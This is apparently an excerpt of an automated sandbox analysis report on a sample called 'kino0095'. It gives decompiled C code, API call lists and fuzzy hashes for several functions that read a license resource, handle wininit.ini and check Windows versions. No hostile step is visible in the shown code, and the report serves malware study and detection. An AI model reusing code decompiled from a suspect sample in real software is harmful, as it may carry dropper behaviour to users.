                                                                                                                                                                                                                                    • Opcode ID: de3e85832d10f640637a191b2ec6c0e0607a77a217b584305e3ae3e36e9ce6a9
                                                                                                                                                                                                                                    • Instruction ID: eed12382a8ca34f06bee008acfba43c6fef3ce89d85d5cdc37156dc56e457b93
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de3e85832d10f640637a191b2ec6c0e0607a77a217b584305e3ae3e36e9ce6a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA31BF31A01228DFDB31CB19DC84BEAB7BCEB45768F0041E5E9C9A2240D7369A85CF55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E010B468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x10b8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E010B468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x10b8d4c, "<None>") == 0) {
							LocalFree( *0x10b8d4c);
							L9:
							 *0x10b9124 = 0;
							return 1;
						}
						_t9 = E010B6517(_t19, 0x7d1, 0, E010B3100, 0, 0);
						LocalFree( *0x10b8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x10b9124 = 0x800704c7;
						L2:
						return 0;
					}
					E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x10b8d4c);
					 *0x10b9124 = 0x80070714;
					goto L2;
				}
				E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10b9124 = E010B6285();
				goto L2;
			}






                                                                                                                                                                                                                                    0x010b3a46
                                                                                                                                                                                                                                    0x010b3a57
                                                                                                                                                                                                                                    0x010b3a5d
                                                                                                                                                                                                                                    0x010b3a63
                                                                                                                                                                                                                                    0x010b3a6a
                                                                                                                                                                                                                                    0x010b3a91
                                                                                                                                                                                                                                    0x010b3a9a
                                                                                                                                                                                                                                    0x010b3ad8
                                                                                                                                                                                                                                    0x010b3b13
                                                                                                                                                                                                                                    0x010b3b19
                                                                                                                                                                                                                                    0x010b3b1b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3b21
                                                                                                                                                                                                                                    0x010b3ae7
                                                                                                                                                                                                                                    0x010b3af4
                                                                                                                                                                                                                                    0x010b3afc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3afe
                                                                                                                                                                                                                                    0x010b3a87
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3a87
                                                                                                                                                                                                                                    0x010b3aa8
                                                                                                                                                                                                                                    0x010b3ab3
                                                                                                                                                                                                                                    0x010b3ab9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3ab9
                                                                                                                                                                                                                                    0x010b3a78
                                                                                                                                                                                                                                    0x010b3a82
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010B2F64,?,00000002,00000000), ref: 010B3A5D
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010B3AB3
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 010B3AD0
                                                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 010B3B13
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
                                                                                                                                                                                                                                      • Part of subcall function 010B6517: FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,010B3100,00000000,00000000), ref: 010B3AF4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                    • Opcode ID: 561c94a5488a3e7d0dd9f28674779ab2fdd1ca48dad93b51ebcfd591bf0912fe
                                                                                                                                                                                                                                    • Instruction ID: 39a646ffc835db6991bd258ac55e62fe1e81620ed41200e8fd51e43f98e6fb26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561c94a5488a3e7d0dd9f28674779ab2fdd1ca48dad93b51ebcfd591bf0912fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2117570700201ABD7746B26ACC8EDB3ABDEFD5740B20442FB6C6EA259DA7F84108764
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E010B24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x10b8004; // 0x72151d89
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E010B658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E010B6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                    0x010b24e0
                                                                                                                                                                                                                                    0x010b24eb
                                                                                                                                                                                                                                    0x010b24f2
                                                                                                                                                                                                                                    0x010b24f7
                                                                                                                                                                                                                                    0x010b2504
                                                                                                                                                                                                                                    0x010b250e
                                                                                                                                                                                                                                    0x010b251d
                                                                                                                                                                                                                                    0x010b252c
                                                                                                                                                                                                                                    0x010b2541
                                                                                                                                                                                                                                    0x010b2546
                                                                                                                                                                                                                                    0x010b2553
                                                                                                                                                                                                                                    0x010b2555
                                                                                                                                                                                                                                    0x010b2555
                                                                                                                                                                                                                                    0x010b2546
                                                                                                                                                                                                                                    0x010b256c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010B2506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010B252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32(?,00000040), ref: 010B253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010B254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 010B2555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: a7b24b1c660e7982a1079e6984b7bd3a9bb83253ca87af6d17cd6f0cd0a3d16a
                                                                                                                                                                                                                                    • Instruction ID: a8bbf717cc845306821d134b5a950d97684b772a86bcfd2dd89f59219c838c5d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7b24b1c660e7982a1079e6984b7bd3a9bb83253ca87af6d17cd6f0cd0a3d16a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC017532700118A7D7709A699C8CEDF7BBCDB55750F000195FAC9D3184DB799A55CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E010B36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x10b8004; // 0x72151d89
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x10b8184 = 1;
						 *0x10b8180 = 1;
						L13:
						 *0x10b9a40 = _t119;
						L14:
						__eflags =  *0x10b8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E010B2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E010B2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x10b8a38 & 0x00000001;
											if(( *0x10b8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E010B681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E010B67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E010B28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x10b9a40 = _t119;
						 *0x10b8184 = 1;
						 *0x10b8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x10b9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x10b8184 = _t135;
							 *0x10b8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010B44B9(0, _t138);
					L66:
					return E010B6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                    0x010b36f9
                                                                                                                                                                                                                                    0x010b3700
                                                                                                                                                                                                                                    0x010b370c
                                                                                                                                                                                                                                    0x010b3716
                                                                                                                                                                                                                                    0x010b3718
                                                                                                                                                                                                                                    0x010b371b
                                                                                                                                                                                                                                    0x010b3721
                                                                                                                                                                                                                                    0x010b372b
                                                                                                                                                                                                                                    0x010b373d
                                                                                                                                                                                                                                    0x010b3745
                                                                                                                                                                                                                                    0x010b3746
                                                                                                                                                                                                                                    0x010b3746
                                                                                                                                                                                                                                    0x010b3749
                                                                                                                                                                                                                                    0x010b37ab
                                                                                                                                                                                                                                    0x010b37ad
                                                                                                                                                                                                                                    0x010b37ae
                                                                                                                                                                                                                                    0x010b37b3
                                                                                                                                                                                                                                    0x010b37b8
                                                                                                                                                                                                                                    0x010b37b8
                                                                                                                                                                                                                                    0x010b37bf
                                                                                                                                                                                                                                    0x010b37bf
                                                                                                                                                                                                                                    0x010b37c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37cb
                                                                                                                                                                                                                                    0x010b37cd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37d5
                                                                                                                                                                                                                                    0x010b37db
                                                                                                                                                                                                                                    0x010b37e8
                                                                                                                                                                                                                                    0x010b37ea
                                                                                                                                                                                                                                    0x010b37ea
                                                                                                                                                                                                                                    0x010b37ea
                                                                                                                                                                                                                                    0x010b37f0
                                                                                                                                                                                                                                    0x010b37f6
                                                                                                                                                                                                                                    0x010b3805
                                                                                                                                                                                                                                    0x010b3817
                                                                                                                                                                                                                                    0x010b382b
                                                                                                                                                                                                                                    0x010b3830
                                                                                                                                                                                                                                    0x010b3836
                                                                                                                                                                                                                                    0x010b383b
                                                                                                                                                                                                                                    0x010b383d
                                                                                                                                                                                                                                    0x010b38eb
                                                                                                                                                                                                                                    0x010b38eb
                                                                                                                                                                                                                                    0x010b38f2
                                                                                                                                                                                                                                    0x010b390c
                                                                                                                                                                                                                                    0x010b3911
                                                                                                                                                                                                                                    0x010b3911
                                                                                                                                                                                                                                    0x010b3913
                                                                                                                                                                                                                                    0x010b394d
                                                                                                                                                                                                                                    0x010b394d
                                                                                                                                                                                                                                    0x010b394f
                                                                                                                                                                                                                                    0x010b38a9
                                                                                                                                                                                                                                    0x010b38a9
                                                                                                                                                                                                                                    0x010b38b0
                                                                                                                                                                                                                                    0x010b38b2
                                                                                                                                                                                                                                    0x010b38b9
                                                                                                                                                                                                                                    0x010b38bb
                                                                                                                                                                                                                                    0x010b38c1
                                                                                                                                                                                                                                    0x010b3975
                                                                                                                                                                                                                                    0x010b38c7
                                                                                                                                                                                                                                    0x010b38de
                                                                                                                                                                                                                                    0x010b38e0
                                                                                                                                                                                                                                    0x010b38e0
                                                                                                                                                                                                                                    0x010b397b
                                                                                                                                                                                                                                    0x010b397d
                                                                                                                                                                                                                                    0x010b39a9
                                                                                                                                                                                                                                    0x010b397f
                                                                                                                                                                                                                                    0x010b3982
                                                                                                                                                                                                                                    0x010b398b
                                                                                                                                                                                                                                    0x010b398d
                                                                                                                                                                                                                                    0x010b398f
                                                                                                                                                                                                                                    0x010b399f
                                                                                                                                                                                                                                    0x010b39a1
                                                                                                                                                                                                                                    0x010b3991
                                                                                                                                                                                                                                    0x010b3991
                                                                                                                                                                                                                                    0x010b3991
                                                                                                                                                                                                                                    0x010b398f
                                                                                                                                                                                                                                    0x010b39af
                                                                                                                                                                                                                                    0x010b39b6
                                                                                                                                                                                                                                    0x010b3a0f
                                                                                                                                                                                                                                    0x010b3a0f
                                                                                                                                                                                                                                    0x010b3a11
                                                                                                                                                                                                                                    0x010b3a13
                                                                                                                                                                                                                                    0x010b3a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b39b8
                                                                                                                                                                                                                                    0x010b39b8
                                                                                                                                                                                                                                    0x010b39ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b39bc
                                                                                                                                                                                                                                    0x010b39bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b39c3
                                                                                                                                                                                                                                    0x010b39c9
                                                                                                                                                                                                                                    0x010b39ce
                                                                                                                                                                                                                                    0x010b39d0
                                                                                                                                                                                                                                    0x010b39e3
                                                                                                                                                                                                                                    0x010b39e5
                                                                                                                                                                                                                                    0x010b39e6
                                                                                                                                                                                                                                    0x010b39f1
                                                                                                                                                                                                                                    0x010b39f7
                                                                                                                                                                                                                                    0x010b39fa
                                                                                                                                                                                                                                    0x010b3a01
                                                                                                                                                                                                                                    0x010b3a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3a06
                                                                                                                                                                                                                                    0x010b3a09
                                                                                                                                                                                                                                    0x010b3a09
                                                                                                                                                                                                                                    0x010b3a0b
                                                                                                                                                                                                                                    0x010b3a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3a09
                                                                                                                                                                                                                                    0x010b39fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b39fc
                                                                                                                                                                                                                                    0x010b39d3
                                                                                                                                                                                                                                    0x010b39d8
                                                                                                                                                                                                                                    0x010b39da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b39dc
                                                                                                                                                                                                                                    0x010b39b6
                                                                                                                                                                                                                                    0x010b3955
                                                                                                                                                                                                                                    0x010b395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3961
                                                                                                                                                                                                                                    0x010b3963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3969
                                                                                                                                                                                                                                    0x010b3969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3969
                                                                                                                                                                                                                                    0x010b3915
                                                                                                                                                                                                                                    0x010b3915
                                                                                                                                                                                                                                    0x010b391b
                                                                                                                                                                                                                                    0x010b391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b392d
                                                                                                                                                                                                                                    0x010b3933
                                                                                                                                                                                                                                    0x010b3938
                                                                                                                                                                                                                                    0x010b393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3940
                                                                                                                                                                                                                                    0x010b3946
                                                                                                                                                                                                                                    0x010b394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38f2
                                                                                                                                                                                                                                    0x010b3843
                                                                                                                                                                                                                                    0x010b3845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b384b
                                                                                                                                                                                                                                    0x010b384d
                                                                                                                                                                                                                                    0x010b3883
                                                                                                                                                                                                                                    0x010b3885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b389a
                                                                                                                                                                                                                                    0x010b389e
                                                                                                                                                                                                                                    0x010b389e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a0
                                                                                                                                                                                                                                    0x010b38a0
                                                                                                                                                                                                                                    0x010b38a2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a4
                                                                                                                                                                                                                                    0x010b384f
                                                                                                                                                                                                                                    0x010b3851
                                                                                                                                                                                                                                    0x010b3857
                                                                                                                                                                                                                                    0x010b386e
                                                                                                                                                                                                                                    0x010b3877
                                                                                                                                                                                                                                    0x010b387b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3881
                                                                                                                                                                                                                                    0x010b3859
                                                                                                                                                                                                                                    0x010b385c
                                                                                                                                                                                                                                    0x010b3862
                                                                                                                                                                                                                                    0x010b3866
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38f4
                                                                                                                                                                                                                                    0x010b38f4
                                                                                                                                                                                                                                    0x010b38f5
                                                                                                                                                                                                                                    0x010b38fb
                                                                                                                                                                                                                                    0x010b3901
                                                                                                                                                                                                                                    0x010b3901
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b390a
                                                                                                                                                                                                                                    0x010b374b
                                                                                                                                                                                                                                    0x010b374e
                                                                                                                                                                                                                                    0x010b375c
                                                                                                                                                                                                                                    0x010b3764
                                                                                                                                                                                                                                    0x010b3769
                                                                                                                                                                                                                                    0x010b376e
                                                                                                                                                                                                                                    0x010b3771
                                                                                                                                                                                                                                    0x010b379c
                                                                                                                                                                                                                                    0x010b379f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37a3
                                                                                                                                                                                                                                    0x010b37a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37a4
                                                                                                                                                                                                                                    0x010b3773
                                                                                                                                                                                                                                    0x010b3777
                                                                                                                                                                                                                                    0x010b3778
                                                                                                                                                                                                                                    0x010b377f
                                                                                                                                                                                                                                    0x010b3781
                                                                                                                                                                                                                                    0x010b378e
                                                                                                                                                                                                                                    0x010b378e
                                                                                                                                                                                                                                    0x010b3794
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3794
